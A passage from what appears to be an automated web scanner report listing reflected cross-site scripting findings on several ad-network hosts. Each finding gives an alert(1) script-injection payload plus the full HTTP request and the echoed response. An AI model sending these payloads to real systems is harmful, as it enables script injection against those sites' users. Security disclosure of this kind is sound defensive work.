GET /admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match23569'%3balert(1)//b87386ea441 HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:26 GMT
X-Name: rtb-o03
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match23569';alert(1)//b87386ea441?admeld_adprovider_id=78&external_user_id=0&expiration=1302798086" alt="" />');

1.24. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccf36'-alert(1)-'517d783341 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=193ccf36'-alert(1)-'517d783341&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=8663496762294337265; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:21:47 GMT
Content-Length: 182

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193ccf36'-alert(1)-'517d783341&external_user_id=8663496762294337265&expiration=0" width="0" height="0"/>');

1.25. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0bd2'-alert(1)-'82d72219828 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matche0bd2'-alert(1)-'82d72219828 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=8663496762294337265; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:21:51 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matche0bd2'-alert(1)-'82d72219828?admeld_adprovider_id=193&external_user_id=8663496762294337265&expiration=0" width="0" height="0"/>');

1.26. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db13b'%3balert(1)//7d749869842 was submitted in the admeld_adprovider_id parameter. This input was echoed as db13b';alert(1)//7d749869842 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=73db13b'%3balert(1)//7d749869842&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:31:37 GMT
Expires: Mon, 11 Apr 2011 16:31:38 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
Set-Cookie: 2=2x5NrHbDfMO; Domain=.lucidmedia.com; Expires=Tue, 10-Apr-2012 16:31:38 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73db13b';alert(1)//7d749869842&external_user_id=3406242444969162266"/>');

1.27. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bef0'%3balert(1)//20f199ae318 was submitted in the admeld_callback parameter. This input was echoed as 2bef0';alert(1)//20f199ae318 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match2bef0'%3balert(1)//20f199ae318 HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:31:39 GMT
Expires: Mon, 11 Apr 2011 16:31:40 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
Set-Cookie: 2=2x5NrivaYDr; Domain=.lucidmedia.com; Expires=Tue, 10-Apr-2012 16:31:40 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match2bef0';alert(1)//20f199ae318?admeld_adprovider_id=73&external_user_id=3406242474301735927"/>');

1.28. http://ads.adap.tv/beacons [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ab9b5<script>alert(1)</script>384174b4e4a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacons?callback=jsonp1302352256751ab9b5<script>alert(1)</script>384174b4e4a HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-1808697827335733967__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-42 14:17:45 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 620

jsonp1302352256751ab9b5<script>alert(1)</script>384174b4e4a({
   "beacons":["http://tags.bluekai.com/site/2174", "http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://pixel.quantserve.com/seg/r;a=p-573scDfDoUH6o;redirect=http://segments.a
...[SNIP]...

1.29. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 257af<script>alert(1)</script>adaed44508d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/682865257af<script>alert(1)</script>adaed44508d?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:44 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/682865257af<script>alert(1)</script>adaed44508d

1.30. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload 41e2c<script>alert(1)</script>c765e6e8b07 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/682865?d=null&r=41e2c<script>alert(1)</script>c765e6e8b07 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:42 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/41e2c<script>alert(1)</script>c765e6e8b07MTY4MzYyMDQ2eDAuNzQzIDEzMDE3ODY2MDV4LTExODAzODE1MDI

1.31. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cd6ca<script>alert(1)</script>eb33f605576 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/684339cd6ca<script>alert(1)</script>eb33f605576?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:41 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/684339cd6ca<script>alert(1)</script>eb33f605576

1.32. http://ads.adbrite.com/adserver/vdi/712156 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/712156

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 519ae<script>alert(1)</script>90d04b9f705 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/712156519ae<script>alert(1)</script>90d04b9f705?d=1iolb30nur9ak HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; vsd=0@1@4d9d6e04@cti.w55c.net; rb=0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 00:22:33 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/712156519ae<script>alert(1)</script>90d04b9f705

1.33. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 43f7e<script>alert(1)</script>2c8a8d39513 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269743f7e<script>alert(1)</script>2c8a8d39513?d=4608069584519221037 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"; rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 11 Apr 2011 16:41:56 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269743f7e<script>alert(1)</script>2c8a8d39513

1.34. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac400<script>alert(1)</script>54595068153 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/762701ac400<script>alert(1)</script>54595068153?d=E3F32BD012B0974D052B68A20247663B HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:30 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/762701ac400<script>alert(1)</script>54595068153

1.35. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 54e24<script>alert(1)</script>80b200b4843 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/77904554e24<script>alert(1)</script>80b200b4843?d=37820808542507095 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:39 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/77904554e24<script>alert(1)</script>80b200b4843

1.36. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 71675<script>alert(1)</script>d3c41350c71 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

